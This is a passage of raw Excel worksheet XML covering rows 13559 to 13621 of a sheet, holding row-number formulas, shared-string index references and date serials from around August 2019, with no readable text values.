        <v>3558</v>
      </c>
      <c r="C13559" t="s">
        <v>19637</v>
      </c>
      <c r="D13559" s="1">
        <v>43688</v>
      </c>
      <c r="E13559" t="s">
        <v>20024</v>
      </c>
      <c r="F13559" t="s">
        <v>10526</v>
      </c>
      <c r="G13559" t="s">
        <v>23894</v>
      </c>
    </row>
    <row r="13560" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13560">
        <f t="shared" si="211"/>
        <v>13559</v>
      </c>
      <c r="B13560">
        <v>3559</v>
      </c>
      <c r="C13560" t="s">
        <v>19637</v>
      </c>
      <c r="D13560" s="1">
        <v>43681</v>
      </c>
      <c r="E13560" t="s">
        <v>21741</v>
      </c>
      <c r="F13560" t="s">
        <v>9978</v>
      </c>
      <c r="G13560" t="s">
        <v>23895</v>
      </c>
    </row>
    <row r="13561" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13561">
        <f t="shared" si="211"/>
        <v>13560</v>
      </c>
      <c r="B13561">
        <v>3560</v>
      </c>
      <c r="C13561" t="s">
        <v>19637</v>
      </c>
      <c r="D13561" s="1">
        <v>43705</v>
      </c>
      <c r="E13561" t="s">
        <v>20696</v>
      </c>
      <c r="F13561" t="s">
        <v>9975</v>
      </c>
      <c r="G13561" t="s">
        <v>23896</v>
      </c>
    </row>
    <row r="13562" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13562">
        <f t="shared" si="211"/>
        <v>13561</v>
      </c>
      <c r="B13562">
        <v>3561</v>
      </c>
      <c r="C13562" t="s">
        <v>19637</v>
      </c>
      <c r="D13562" s="1">
        <v>43705</v>
      </c>
      <c r="F13562" t="s">
        <v>10526</v>
      </c>
      <c r="G13562" t="s">
        <v>23897</v>
      </c>
    </row>
    <row r="13563" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13563">
        <f t="shared" si="211"/>
        <v>13562</v>
      </c>
      <c r="B13563">
        <v>3562</v>
      </c>
      <c r="C13563" t="s">
        <v>19637</v>
      </c>
      <c r="D13563" s="1">
        <v>43707</v>
      </c>
      <c r="F13563" t="s">
        <v>9975</v>
      </c>
      <c r="G13563" t="s">
        <v>23898</v>
      </c>
    </row>
    <row r="13564" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13564">
        <f t="shared" si="211"/>
        <v>13563</v>
      </c>
      <c r="B13564">
        <v>3563</v>
      </c>
      <c r="C13564" t="s">
        <v>19637</v>
      </c>
      <c r="D13564" s="1">
        <v>43683</v>
      </c>
      <c r="E13564" t="s">
        <v>20421</v>
      </c>
      <c r="F13564" t="s">
        <v>10021</v>
      </c>
      <c r="G13564" t="s">
        <v>23899</v>
      </c>
    </row>
    <row r="13565" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13565">
        <f t="shared" si="211"/>
        <v>13564</v>
      </c>
      <c r="B13565">
        <v>3564</v>
      </c>
      <c r="C13565" t="s">
        <v>19637</v>
      </c>
      <c r="D13565" s="1">
        <v>43696</v>
      </c>
      <c r="E13565" t="s">
        <v>23071</v>
      </c>
      <c r="F13565" t="s">
        <v>10526</v>
      </c>
      <c r="G13565" t="s">
        <v>23900</v>
      </c>
    </row>
    <row r="13566" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13566">
        <f t="shared" si="211"/>
        <v>13565</v>
      </c>
      <c r="B13566">
        <v>3565</v>
      </c>
      <c r="C13566" t="s">
        <v>19637</v>
      </c>
      <c r="D13566" s="1">
        <v>43680</v>
      </c>
      <c r="E13566" t="s">
        <v>19849</v>
      </c>
      <c r="F13566" t="s">
        <v>10021</v>
      </c>
      <c r="G13566" t="s">
        <v>23901</v>
      </c>
    </row>
    <row r="13567" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13567">
        <f t="shared" si="211"/>
        <v>13566</v>
      </c>
      <c r="B13567">
        <v>3566</v>
      </c>
      <c r="C13567" t="s">
        <v>19637</v>
      </c>
      <c r="D13567" s="1">
        <v>43679</v>
      </c>
      <c r="E13567" t="s">
        <v>22330</v>
      </c>
      <c r="F13567" t="s">
        <v>10526</v>
      </c>
      <c r="G13567" t="s">
        <v>23902</v>
      </c>
    </row>
    <row r="13568" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13568">
        <f t="shared" si="211"/>
        <v>13567</v>
      </c>
      <c r="B13568">
        <v>3567</v>
      </c>
      <c r="C13568" t="s">
        <v>19637</v>
      </c>
      <c r="D13568" s="1">
        <v>43683</v>
      </c>
      <c r="E13568" t="s">
        <v>19638</v>
      </c>
      <c r="F13568" t="s">
        <v>10021</v>
      </c>
      <c r="G13568" t="s">
        <v>23903</v>
      </c>
    </row>
    <row r="13569" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13569">
        <f t="shared" si="211"/>
        <v>13568</v>
      </c>
      <c r="B13569">
        <v>3568</v>
      </c>
      <c r="C13569" t="s">
        <v>19637</v>
      </c>
      <c r="D13569" s="1">
        <v>43698</v>
      </c>
      <c r="E13569" t="s">
        <v>19680</v>
      </c>
      <c r="F13569" t="s">
        <v>10021</v>
      </c>
      <c r="G13569" t="s">
        <v>23904</v>
      </c>
    </row>
    <row r="13570" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13570">
        <f t="shared" si="211"/>
        <v>13569</v>
      </c>
      <c r="B13570">
        <v>3569</v>
      </c>
      <c r="C13570" t="s">
        <v>19637</v>
      </c>
      <c r="D13570" s="1">
        <v>43693</v>
      </c>
      <c r="E13570" t="s">
        <v>19896</v>
      </c>
      <c r="F13570" t="s">
        <v>10021</v>
      </c>
      <c r="G13570" t="s">
        <v>23905</v>
      </c>
    </row>
    <row r="13571" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13571">
        <f t="shared" ref="A13571:A13634" si="212">+ROW(A13570)</f>
        <v>13570</v>
      </c>
      <c r="B13571">
        <v>3570</v>
      </c>
      <c r="C13571" t="s">
        <v>19637</v>
      </c>
      <c r="D13571" s="1">
        <v>43678</v>
      </c>
      <c r="F13571" t="s">
        <v>10526</v>
      </c>
      <c r="G13571" t="s">
        <v>23906</v>
      </c>
    </row>
    <row r="13572" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13572">
        <f t="shared" si="212"/>
        <v>13571</v>
      </c>
      <c r="B13572">
        <v>3571</v>
      </c>
      <c r="C13572" t="s">
        <v>19637</v>
      </c>
      <c r="D13572" s="1">
        <v>43683</v>
      </c>
      <c r="E13572" t="s">
        <v>19640</v>
      </c>
      <c r="F13572" t="s">
        <v>10021</v>
      </c>
      <c r="G13572" t="s">
        <v>23907</v>
      </c>
    </row>
    <row r="13573" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13573">
        <f t="shared" si="212"/>
        <v>13572</v>
      </c>
      <c r="B13573">
        <v>3572</v>
      </c>
      <c r="C13573" t="s">
        <v>19637</v>
      </c>
      <c r="D13573" s="1">
        <v>43683</v>
      </c>
      <c r="E13573" t="s">
        <v>21281</v>
      </c>
      <c r="F13573" t="s">
        <v>10526</v>
      </c>
      <c r="G13573" t="s">
        <v>23908</v>
      </c>
    </row>
    <row r="13574" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13574">
        <f t="shared" si="212"/>
        <v>13573</v>
      </c>
      <c r="B13574">
        <v>3573</v>
      </c>
      <c r="C13574" t="s">
        <v>19637</v>
      </c>
      <c r="D13574" s="1">
        <v>43683</v>
      </c>
      <c r="E13574" t="s">
        <v>19896</v>
      </c>
      <c r="F13574" t="s">
        <v>10021</v>
      </c>
      <c r="G13574" t="s">
        <v>23909</v>
      </c>
    </row>
    <row r="13575" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13575">
        <f t="shared" si="212"/>
        <v>13574</v>
      </c>
      <c r="B13575">
        <v>3574</v>
      </c>
      <c r="C13575" t="s">
        <v>19637</v>
      </c>
      <c r="D13575" s="1">
        <v>43678</v>
      </c>
      <c r="F13575" t="s">
        <v>10526</v>
      </c>
      <c r="G13575" t="s">
        <v>23839</v>
      </c>
    </row>
    <row r="13576" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13576">
        <f t="shared" si="212"/>
        <v>13575</v>
      </c>
      <c r="B13576">
        <v>3575</v>
      </c>
      <c r="C13576" t="s">
        <v>19637</v>
      </c>
      <c r="D13576" s="1">
        <v>43698</v>
      </c>
      <c r="E13576" t="s">
        <v>19640</v>
      </c>
      <c r="F13576" t="s">
        <v>10021</v>
      </c>
      <c r="G13576" t="s">
        <v>23910</v>
      </c>
    </row>
    <row r="13577" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13577">
        <f t="shared" si="212"/>
        <v>13576</v>
      </c>
      <c r="B13577">
        <v>3576</v>
      </c>
      <c r="C13577" t="s">
        <v>19637</v>
      </c>
      <c r="D13577" s="1">
        <v>43695</v>
      </c>
      <c r="E13577" t="s">
        <v>20829</v>
      </c>
      <c r="F13577" t="s">
        <v>10021</v>
      </c>
      <c r="G13577" t="s">
        <v>23911</v>
      </c>
    </row>
    <row r="13578" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13578">
        <f t="shared" si="212"/>
        <v>13577</v>
      </c>
      <c r="B13578">
        <v>3577</v>
      </c>
      <c r="C13578" t="s">
        <v>19637</v>
      </c>
      <c r="D13578" s="1">
        <v>43685</v>
      </c>
      <c r="E13578" t="s">
        <v>23912</v>
      </c>
      <c r="F13578" t="s">
        <v>10526</v>
      </c>
      <c r="G13578" t="s">
        <v>23913</v>
      </c>
    </row>
    <row r="13579" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13579">
        <f t="shared" si="212"/>
        <v>13578</v>
      </c>
      <c r="B13579">
        <v>3578</v>
      </c>
      <c r="C13579" t="s">
        <v>19637</v>
      </c>
      <c r="D13579" s="1">
        <v>43687</v>
      </c>
      <c r="E13579" t="s">
        <v>20220</v>
      </c>
      <c r="F13579" t="s">
        <v>10021</v>
      </c>
      <c r="G13579" t="s">
        <v>23914</v>
      </c>
    </row>
    <row r="13580" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13580">
        <f t="shared" si="212"/>
        <v>13579</v>
      </c>
      <c r="B13580">
        <v>3579</v>
      </c>
      <c r="C13580" t="s">
        <v>19637</v>
      </c>
      <c r="D13580" s="1">
        <v>43706</v>
      </c>
      <c r="E13580" t="s">
        <v>20694</v>
      </c>
      <c r="F13580" t="s">
        <v>10526</v>
      </c>
      <c r="G13580" t="s">
        <v>23915</v>
      </c>
    </row>
    <row r="13581" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13581">
        <f t="shared" si="212"/>
        <v>13580</v>
      </c>
      <c r="B13581">
        <v>3580</v>
      </c>
      <c r="C13581" t="s">
        <v>19637</v>
      </c>
      <c r="D13581" s="1">
        <v>43688</v>
      </c>
      <c r="E13581" t="s">
        <v>23916</v>
      </c>
      <c r="F13581" t="s">
        <v>10526</v>
      </c>
      <c r="G13581" t="s">
        <v>23917</v>
      </c>
    </row>
    <row r="13582" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13582">
        <f t="shared" si="212"/>
        <v>13581</v>
      </c>
      <c r="B13582">
        <v>3581</v>
      </c>
      <c r="C13582" t="s">
        <v>19637</v>
      </c>
      <c r="D13582" s="1">
        <v>43699</v>
      </c>
      <c r="E13582" t="s">
        <v>20253</v>
      </c>
      <c r="F13582" t="s">
        <v>9978</v>
      </c>
      <c r="G13582" t="s">
        <v>23918</v>
      </c>
    </row>
    <row r="13583" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13583">
        <f t="shared" si="212"/>
        <v>13582</v>
      </c>
      <c r="B13583">
        <v>3582</v>
      </c>
      <c r="C13583" t="s">
        <v>19637</v>
      </c>
      <c r="D13583" s="1">
        <v>43707</v>
      </c>
      <c r="E13583" t="s">
        <v>19750</v>
      </c>
      <c r="F13583" t="s">
        <v>9978</v>
      </c>
      <c r="G13583" t="s">
        <v>23919</v>
      </c>
    </row>
    <row r="13584" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13584">
        <f t="shared" si="212"/>
        <v>13583</v>
      </c>
      <c r="B13584">
        <v>3583</v>
      </c>
      <c r="C13584" t="s">
        <v>19637</v>
      </c>
      <c r="D13584" s="1">
        <v>43678</v>
      </c>
      <c r="E13584" t="s">
        <v>23920</v>
      </c>
      <c r="F13584" t="s">
        <v>10526</v>
      </c>
      <c r="G13584" t="s">
        <v>23921</v>
      </c>
    </row>
    <row r="13585" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13585">
        <f t="shared" si="212"/>
        <v>13584</v>
      </c>
      <c r="B13585">
        <v>3584</v>
      </c>
      <c r="C13585" t="s">
        <v>19637</v>
      </c>
      <c r="D13585" s="1">
        <v>43695</v>
      </c>
      <c r="F13585" t="s">
        <v>10526</v>
      </c>
      <c r="G13585" t="s">
        <v>23922</v>
      </c>
    </row>
    <row r="13586" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13586">
        <f t="shared" si="212"/>
        <v>13585</v>
      </c>
      <c r="B13586">
        <v>3585</v>
      </c>
      <c r="C13586" t="s">
        <v>19637</v>
      </c>
      <c r="D13586" s="1">
        <v>43685</v>
      </c>
      <c r="E13586" t="s">
        <v>19896</v>
      </c>
      <c r="F13586" t="s">
        <v>10021</v>
      </c>
      <c r="G13586" t="s">
        <v>23923</v>
      </c>
    </row>
    <row r="13587" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13587">
        <f t="shared" si="212"/>
        <v>13586</v>
      </c>
      <c r="B13587">
        <v>3586</v>
      </c>
      <c r="C13587" t="s">
        <v>19637</v>
      </c>
      <c r="D13587" s="1">
        <v>43693</v>
      </c>
      <c r="E13587" t="s">
        <v>19952</v>
      </c>
      <c r="F13587" t="s">
        <v>9978</v>
      </c>
      <c r="G13587" t="s">
        <v>23924</v>
      </c>
    </row>
    <row r="13588" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13588">
        <f t="shared" si="212"/>
        <v>13587</v>
      </c>
      <c r="B13588">
        <v>3587</v>
      </c>
      <c r="C13588" t="s">
        <v>19637</v>
      </c>
      <c r="D13588" s="1">
        <v>43694</v>
      </c>
      <c r="E13588" t="s">
        <v>19741</v>
      </c>
      <c r="F13588" t="s">
        <v>9975</v>
      </c>
      <c r="G13588" t="s">
        <v>23925</v>
      </c>
    </row>
    <row r="13589" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13589">
        <f t="shared" si="212"/>
        <v>13588</v>
      </c>
      <c r="B13589">
        <v>3588</v>
      </c>
      <c r="C13589" t="s">
        <v>19637</v>
      </c>
      <c r="D13589" s="1">
        <v>43684</v>
      </c>
      <c r="E13589" t="s">
        <v>23926</v>
      </c>
      <c r="F13589" t="s">
        <v>10526</v>
      </c>
      <c r="G13589" t="s">
        <v>23927</v>
      </c>
    </row>
    <row r="13590" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13590">
        <f t="shared" si="212"/>
        <v>13589</v>
      </c>
      <c r="B13590">
        <v>3589</v>
      </c>
      <c r="C13590" t="s">
        <v>19637</v>
      </c>
      <c r="D13590" s="1">
        <v>43698</v>
      </c>
      <c r="E13590" t="s">
        <v>19648</v>
      </c>
      <c r="F13590" t="s">
        <v>10021</v>
      </c>
      <c r="G13590" t="s">
        <v>23928</v>
      </c>
    </row>
    <row r="13591" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13591">
        <f t="shared" si="212"/>
        <v>13590</v>
      </c>
      <c r="B13591">
        <v>3590</v>
      </c>
      <c r="C13591" t="s">
        <v>19637</v>
      </c>
      <c r="D13591" s="1">
        <v>43703</v>
      </c>
      <c r="F13591" t="s">
        <v>10526</v>
      </c>
      <c r="G13591" t="s">
        <v>23929</v>
      </c>
    </row>
    <row r="13592" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13592">
        <f t="shared" si="212"/>
        <v>13591</v>
      </c>
      <c r="B13592">
        <v>3591</v>
      </c>
      <c r="C13592" t="s">
        <v>19637</v>
      </c>
      <c r="D13592" s="1">
        <v>43699</v>
      </c>
      <c r="E13592" t="s">
        <v>23930</v>
      </c>
      <c r="F13592" t="s">
        <v>10526</v>
      </c>
      <c r="G13592" t="s">
        <v>23931</v>
      </c>
    </row>
    <row r="13593" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13593">
        <f t="shared" si="212"/>
        <v>13592</v>
      </c>
      <c r="B13593">
        <v>3592</v>
      </c>
      <c r="C13593" t="s">
        <v>19637</v>
      </c>
      <c r="D13593" s="1">
        <v>43699</v>
      </c>
      <c r="E13593" t="s">
        <v>19830</v>
      </c>
      <c r="F13593" t="s">
        <v>10526</v>
      </c>
      <c r="G13593" t="s">
        <v>23932</v>
      </c>
    </row>
    <row r="13594" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13594">
        <f t="shared" si="212"/>
        <v>13593</v>
      </c>
      <c r="B13594">
        <v>3593</v>
      </c>
      <c r="C13594" t="s">
        <v>19637</v>
      </c>
      <c r="D13594" s="1">
        <v>43699</v>
      </c>
      <c r="E13594" t="s">
        <v>20430</v>
      </c>
      <c r="F13594" t="s">
        <v>10021</v>
      </c>
      <c r="G13594" t="s">
        <v>23933</v>
      </c>
    </row>
    <row r="13595" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13595">
        <f t="shared" si="212"/>
        <v>13594</v>
      </c>
      <c r="B13595">
        <v>3594</v>
      </c>
      <c r="C13595" t="s">
        <v>19637</v>
      </c>
      <c r="D13595" s="1">
        <v>43681</v>
      </c>
      <c r="E13595" t="s">
        <v>19640</v>
      </c>
      <c r="F13595" t="s">
        <v>9975</v>
      </c>
      <c r="G13595" t="s">
        <v>23934</v>
      </c>
    </row>
    <row r="13596" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13596">
        <f t="shared" si="212"/>
        <v>13595</v>
      </c>
      <c r="B13596">
        <v>3595</v>
      </c>
      <c r="C13596" t="s">
        <v>19637</v>
      </c>
      <c r="D13596" s="1">
        <v>43685</v>
      </c>
      <c r="E13596" t="s">
        <v>19727</v>
      </c>
      <c r="F13596" t="s">
        <v>9975</v>
      </c>
      <c r="G13596" t="s">
        <v>19728</v>
      </c>
    </row>
    <row r="13597" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13597">
        <f t="shared" si="212"/>
        <v>13596</v>
      </c>
      <c r="B13597">
        <v>3596</v>
      </c>
      <c r="C13597" t="s">
        <v>19637</v>
      </c>
      <c r="D13597" s="1">
        <v>43692</v>
      </c>
      <c r="E13597" t="s">
        <v>19643</v>
      </c>
      <c r="F13597" t="s">
        <v>10021</v>
      </c>
      <c r="G13597" t="s">
        <v>23935</v>
      </c>
    </row>
    <row r="13598" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13598">
        <f t="shared" si="212"/>
        <v>13597</v>
      </c>
      <c r="B13598">
        <v>3597</v>
      </c>
      <c r="C13598" t="s">
        <v>19637</v>
      </c>
      <c r="D13598" s="1">
        <v>43678</v>
      </c>
      <c r="E13598" t="s">
        <v>23936</v>
      </c>
      <c r="F13598" t="s">
        <v>10526</v>
      </c>
      <c r="G13598" t="s">
        <v>23937</v>
      </c>
    </row>
    <row r="13599" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13599">
        <f t="shared" si="212"/>
        <v>13598</v>
      </c>
      <c r="B13599">
        <v>3598</v>
      </c>
      <c r="C13599" t="s">
        <v>19637</v>
      </c>
      <c r="D13599" s="1">
        <v>43699</v>
      </c>
      <c r="E13599" t="s">
        <v>23926</v>
      </c>
      <c r="F13599" t="s">
        <v>10526</v>
      </c>
      <c r="G13599" t="s">
        <v>23938</v>
      </c>
    </row>
    <row r="13600" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13600">
        <f t="shared" si="212"/>
        <v>13599</v>
      </c>
      <c r="B13600">
        <v>3599</v>
      </c>
      <c r="C13600" t="s">
        <v>19637</v>
      </c>
      <c r="D13600" s="1">
        <v>43690</v>
      </c>
      <c r="E13600" t="s">
        <v>20253</v>
      </c>
      <c r="F13600" t="s">
        <v>9978</v>
      </c>
      <c r="G13600" t="s">
        <v>23939</v>
      </c>
    </row>
    <row r="13601" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13601">
        <f t="shared" si="212"/>
        <v>13600</v>
      </c>
      <c r="B13601">
        <v>3600</v>
      </c>
      <c r="C13601" t="s">
        <v>19637</v>
      </c>
      <c r="D13601" s="1">
        <v>43691</v>
      </c>
      <c r="E13601" t="s">
        <v>21389</v>
      </c>
      <c r="F13601" t="s">
        <v>9975</v>
      </c>
      <c r="G13601" t="s">
        <v>23940</v>
      </c>
    </row>
    <row r="13602" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13602">
        <f t="shared" si="212"/>
        <v>13601</v>
      </c>
      <c r="B13602">
        <v>3601</v>
      </c>
      <c r="C13602" t="s">
        <v>19637</v>
      </c>
      <c r="D13602" s="1">
        <v>43686</v>
      </c>
      <c r="E13602" t="s">
        <v>19741</v>
      </c>
      <c r="F13602" t="s">
        <v>9975</v>
      </c>
      <c r="G13602" t="s">
        <v>23941</v>
      </c>
    </row>
    <row r="13603" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13603">
        <f t="shared" si="212"/>
        <v>13602</v>
      </c>
      <c r="B13603">
        <v>3602</v>
      </c>
      <c r="C13603" t="s">
        <v>19637</v>
      </c>
      <c r="D13603" s="1">
        <v>43694</v>
      </c>
      <c r="F13603" t="s">
        <v>10526</v>
      </c>
      <c r="G13603" t="s">
        <v>23942</v>
      </c>
    </row>
    <row r="13604" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13604">
        <f t="shared" si="212"/>
        <v>13603</v>
      </c>
      <c r="B13604">
        <v>3603</v>
      </c>
      <c r="C13604" t="s">
        <v>19637</v>
      </c>
      <c r="D13604" s="1">
        <v>43696</v>
      </c>
      <c r="E13604" t="s">
        <v>19640</v>
      </c>
      <c r="F13604" t="s">
        <v>9975</v>
      </c>
      <c r="G13604" t="s">
        <v>23943</v>
      </c>
    </row>
    <row r="13605" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13605">
        <f t="shared" si="212"/>
        <v>13604</v>
      </c>
      <c r="B13605">
        <v>3604</v>
      </c>
      <c r="C13605" t="s">
        <v>19637</v>
      </c>
      <c r="D13605" s="1">
        <v>43684</v>
      </c>
      <c r="E13605" t="s">
        <v>20220</v>
      </c>
      <c r="F13605" t="s">
        <v>10021</v>
      </c>
      <c r="G13605" t="s">
        <v>23944</v>
      </c>
    </row>
    <row r="13606" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13606">
        <f t="shared" si="212"/>
        <v>13605</v>
      </c>
      <c r="B13606">
        <v>3605</v>
      </c>
      <c r="C13606" t="s">
        <v>19637</v>
      </c>
      <c r="D13606" s="1">
        <v>43697</v>
      </c>
      <c r="E13606" t="s">
        <v>19680</v>
      </c>
      <c r="F13606" t="s">
        <v>10021</v>
      </c>
      <c r="G13606" t="s">
        <v>23945</v>
      </c>
    </row>
    <row r="13607" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13607">
        <f t="shared" si="212"/>
        <v>13606</v>
      </c>
      <c r="B13607">
        <v>3606</v>
      </c>
      <c r="C13607" t="s">
        <v>19637</v>
      </c>
      <c r="D13607" s="1">
        <v>43685</v>
      </c>
      <c r="E13607" t="s">
        <v>19643</v>
      </c>
      <c r="F13607" t="s">
        <v>10021</v>
      </c>
      <c r="G13607" t="s">
        <v>23946</v>
      </c>
    </row>
    <row r="13608" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13608">
        <f t="shared" si="212"/>
        <v>13607</v>
      </c>
      <c r="B13608">
        <v>3607</v>
      </c>
      <c r="C13608" t="s">
        <v>19637</v>
      </c>
      <c r="D13608" s="1">
        <v>43678</v>
      </c>
      <c r="E13608" t="s">
        <v>21111</v>
      </c>
      <c r="F13608" t="s">
        <v>10021</v>
      </c>
      <c r="G13608" t="s">
        <v>23947</v>
      </c>
    </row>
    <row r="13609" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13609">
        <f t="shared" si="212"/>
        <v>13608</v>
      </c>
      <c r="B13609">
        <v>3608</v>
      </c>
      <c r="C13609" t="s">
        <v>19637</v>
      </c>
      <c r="D13609" s="1">
        <v>43688</v>
      </c>
      <c r="E13609" t="s">
        <v>23948</v>
      </c>
      <c r="F13609" t="s">
        <v>10526</v>
      </c>
      <c r="G13609" t="s">
        <v>23949</v>
      </c>
    </row>
    <row r="13610" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13610">
        <f t="shared" si="212"/>
        <v>13609</v>
      </c>
      <c r="B13610">
        <v>3609</v>
      </c>
      <c r="C13610" t="s">
        <v>19637</v>
      </c>
      <c r="D13610" s="1">
        <v>43702</v>
      </c>
      <c r="E13610" t="s">
        <v>23950</v>
      </c>
      <c r="F13610" t="s">
        <v>10526</v>
      </c>
      <c r="G13610" t="s">
        <v>23951</v>
      </c>
    </row>
    <row r="13611" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13611">
        <f t="shared" si="212"/>
        <v>13610</v>
      </c>
      <c r="B13611">
        <v>3610</v>
      </c>
      <c r="C13611" t="s">
        <v>19637</v>
      </c>
      <c r="D13611" s="1">
        <v>43682</v>
      </c>
      <c r="E13611" t="s">
        <v>19640</v>
      </c>
      <c r="F13611" t="s">
        <v>9975</v>
      </c>
      <c r="G13611" t="s">
        <v>23952</v>
      </c>
    </row>
    <row r="13612" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13612">
        <f t="shared" si="212"/>
        <v>13611</v>
      </c>
      <c r="B13612">
        <v>3611</v>
      </c>
      <c r="C13612" t="s">
        <v>19637</v>
      </c>
      <c r="D13612" s="1">
        <v>43678</v>
      </c>
      <c r="E13612" t="s">
        <v>20862</v>
      </c>
      <c r="F13612" t="s">
        <v>10021</v>
      </c>
      <c r="G13612" t="s">
        <v>23953</v>
      </c>
    </row>
    <row r="13613" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13613">
        <f t="shared" si="212"/>
        <v>13612</v>
      </c>
      <c r="B13613">
        <v>3612</v>
      </c>
      <c r="C13613" t="s">
        <v>19637</v>
      </c>
      <c r="D13613" s="1">
        <v>43692</v>
      </c>
      <c r="E13613" t="s">
        <v>20312</v>
      </c>
      <c r="F13613" t="s">
        <v>10526</v>
      </c>
      <c r="G13613" t="s">
        <v>23954</v>
      </c>
    </row>
    <row r="13614" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13614">
        <f t="shared" si="212"/>
        <v>13613</v>
      </c>
      <c r="B13614">
        <v>3613</v>
      </c>
      <c r="C13614" t="s">
        <v>19637</v>
      </c>
      <c r="D13614" s="1">
        <v>43703</v>
      </c>
      <c r="F13614" t="s">
        <v>10526</v>
      </c>
      <c r="G13614" t="s">
        <v>23955</v>
      </c>
    </row>
    <row r="13615" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13615">
        <f t="shared" si="212"/>
        <v>13614</v>
      </c>
      <c r="B13615">
        <v>3614</v>
      </c>
      <c r="C13615" t="s">
        <v>19637</v>
      </c>
      <c r="D13615" s="1">
        <v>43691</v>
      </c>
      <c r="E13615" t="s">
        <v>19896</v>
      </c>
      <c r="F13615" t="s">
        <v>10021</v>
      </c>
      <c r="G13615" t="s">
        <v>23956</v>
      </c>
    </row>
    <row r="13616" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13616">
        <f t="shared" si="212"/>
        <v>13615</v>
      </c>
      <c r="B13616">
        <v>3615</v>
      </c>
      <c r="C13616" t="s">
        <v>19637</v>
      </c>
      <c r="D13616" s="1">
        <v>43693</v>
      </c>
      <c r="F13616" t="s">
        <v>9978</v>
      </c>
      <c r="G13616" t="s">
        <v>23957</v>
      </c>
    </row>
    <row r="13617" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13617">
        <f t="shared" si="212"/>
        <v>13616</v>
      </c>
      <c r="B13617">
        <v>3616</v>
      </c>
      <c r="C13617" t="s">
        <v>19637</v>
      </c>
      <c r="D13617" s="1">
        <v>43683</v>
      </c>
      <c r="E13617" t="s">
        <v>20250</v>
      </c>
      <c r="F13617" t="s">
        <v>10021</v>
      </c>
      <c r="G13617" t="s">
        <v>23958</v>
      </c>
    </row>
    <row r="13618" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13618">
        <f t="shared" si="212"/>
        <v>13617</v>
      </c>
      <c r="B13618">
        <v>3617</v>
      </c>
      <c r="C13618" t="s">
        <v>19637</v>
      </c>
      <c r="D13618" s="1">
        <v>43699</v>
      </c>
      <c r="E13618" t="s">
        <v>19640</v>
      </c>
      <c r="F13618" t="s">
        <v>10021</v>
      </c>
      <c r="G13618" t="s">
        <v>23959</v>
      </c>
    </row>
    <row r="13619" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13619">
        <f t="shared" si="212"/>
        <v>13618</v>
      </c>
      <c r="B13619">
        <v>3618</v>
      </c>
      <c r="C13619" t="s">
        <v>19637</v>
      </c>
      <c r="D13619" s="1">
        <v>43678</v>
      </c>
      <c r="E13619" t="s">
        <v>23960</v>
      </c>
      <c r="F13619" t="s">
        <v>10526</v>
      </c>
      <c r="G13619" t="s">
        <v>23961</v>
      </c>
    </row>
    <row r="13620" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13620">
        <f t="shared" si="212"/>
        <v>13619</v>
      </c>
      <c r="B13620">
        <v>3619</v>
      </c>
      <c r="C13620" t="s">
        <v>19637</v>
      </c>
      <c r="D13620" s="1">
        <v>43699</v>
      </c>
      <c r="E13620" t="s">
        <v>19648</v>
      </c>
      <c r="F13620" t="s">
        <v>10021</v>
      </c>
      <c r="G13620" t="s">
        <v>23962</v>
      </c>
    </row>
    <row r="13621" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13621">
        <f t="shared" si="212"/>
        <v>13620</v>
